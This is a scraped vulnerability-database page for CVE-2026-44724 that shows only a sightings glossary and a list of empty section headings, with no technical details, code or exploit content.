Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-44724 (GCVE-0-2026-44724)

FKIE_CVE-2026-44724

GHSA-HVX9-HWR7-WJJ9

Summary

Affected Component & Versions

Impact & Threat Model

Root Cause Analysis

Exact Code Flow & File Paths

Proof of Concept (PoC) & Reproduction Steps

Local Validation Summary & Aggregate Reachability

Why This Is Not Intended Behavior

Recommended Fix

Regression Test Ideas

Credit request

Tags

Sightings

Nomenclature